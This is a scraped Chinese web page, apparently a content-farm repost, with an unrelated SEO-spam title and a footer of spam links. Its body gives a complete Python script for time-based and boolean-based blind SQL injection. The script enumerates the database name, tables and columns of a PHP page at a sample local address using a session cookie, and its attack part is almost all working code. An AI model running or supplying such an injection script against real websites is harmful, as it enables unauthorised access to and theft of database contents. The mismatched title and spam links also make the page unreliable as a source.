当前位置: 首页 > news >正文

个人接装修活seo网站推广专员招聘

news 2025/7/16 1:52:59
个人接装修活,seo网站推广专员招聘,网站推广计划的内容,企业网站优化方法包括python 实现盲注 该python脚本根据之前介绍的盲注原理实现, 对于发送的注入请求没有做等待间隔, 可能给目标服务器造成一定 压力, 所以仅限于本地测试使用. import requests, time# 时间型盲注 def time_blind(base_url, cookie):for length in range(1, 20): # 测试数据库名…

python 实现盲注

该python脚本根据之前介绍的盲注原理实现, 对于发送的注入请求没有做等待间隔, 可能给目标服务器造成一定 压力, 所以仅限于本地测试使用.

import requests, time# 时间型盲注
def time_blind(base_url, cookie):for length in range(1, 20): # 测试数据库名长度 1~19start = time.time()header = {"Cookie": cookie}url = f"{base_url} and if(length(database())={length}, sleep(3.5), 1)"_ = requests.get(url=url, headers=header)end = time.time()resptime = end-startif int(resptime) >= 3:print('数据库长度为:', length)breakelse:print(url)# 布尔型盲注爆列名
def bool_blind(base_url, cookie):chars = "abcdefghijklmnopqrstuvwxyz0123456789_,"session = requests.session()base_url = base_urlheader = {"Cookie": cookie}# 先定义猜对的时候的长度resp = session.get(url=base_url + " and 1=1", headers=header)base_len = len(resp.text)# 先获取数据库长度for db_len in range(1, 20):url = f"{base_url} and length(database())={db_len}"resp = session.get(url=url, headers=header)if len(resp.text) == base_len:breakprint(f"数据库长度:{db_len}")# 根据数据库长度猜名称db_name = ''for i in range(1, db_len+1):for c in chars:url = f"{base_url} and substr(database(), {i}, 1)='{c}'"resp = session.get(url=url, headers=header)if len(resp.text) == base_len:db_name += cbreakprint(f"数据库名:{db_name}")# 根据数据库名称猜表名table_name = ''for i in range(1, 40):for c in chars:sql = f"select group_concat(table_name) from information_schema.tables where table_schema='{db_name}'"url = f"{base_url} and substr(({sql}), {i}, 1)='{c}'"resp = session.get(url=url, headers=header)if len(resp.text) == base_len:table_name += cbreakprint(f"数据库中的表名:{table_name}")# 猜所有表的列名table_list = table_name.strip().split(',')for table in table_list:column_name = ''for i in range(100):for c in chars:sql = f"select group_concat(column_name) from information_schema.columns where table_schema='{db_name}' and table_name='{table}'"url = f"{base_url} and substr(({sql}), {i}, 1)='{c}'"resp = session.get(url=url, headers=header)if len(resp.text) == base_len:column_name += cbreakprint(f"表{table}的列名:{column_name}")if __name__ == '__main__':url = "http://192.168.112.200/security/read.php?id=1"cookie = "PHPSESSID=b4d659be5e17d948fd8e18078003d3f6"time_blind(base_url=url, cookie=cookie)# bool_blind(base_url=url, cookie=cookie)
http://www.hrbkazy.com/news/35915.html

相关文章:

  • 广东网站建设报价企业seo案例
  • 怎么看网站做的好不好营销策划培训
  • 营销型网站建设大千建站百度网盘电话人工服务
  • 做网站的如何说服客户推广文案范例
  • 网站模板使用百度下载安装 官方
  • 注册门户网站百度推广客服电话24小时
  • 美丽定制 网站模板百度搜索风云榜小说总榜
  • 国际时事新闻最新网站seo优化徐州百度网络
  • 兰州做网站客户广州专业网络推广公司
  • 东莞专业网站建设公司网站怎么优化关键词排名
  • 做网站人员配置网址大全名称
  • 沈阳网站建设公司怎么样国外媒体报道
  • 有什么软件可以做网站桔子seo
  • 北京开发区建设委员会网站关键词列表
  • php网站开发事例谷歌官方网站登录入口
  • 铜川做网站的公司5118站长工具箱
  • 上海工商网查询营业执照seo入门培训学多久
  • 成品网站1688入门网百度图片搜索图片识别
  • 做网站公司促销海报长春网站制作计划
  • 青岛微网站建设电商网站建设定制
  • scrm企业微信管理系统安卓优化大师全部版本
  • wordpress如何上传附件企业网站seo推广
  • 建设娱乐城网站windows优化大师最新版本
  • 网站群建设标准免费培训网站
  • 做网站需要哪些程序免费刷粉网站推广免费
  • 学习做网站只学过c亿速云
  • 企通互联的网站建设失败网络推广服务外包公司
  • 做免费的网站教程百度一下官网页
  • 龙岗做网站建设小白如何学电商运营
  • 官网传奇搜狗seo软件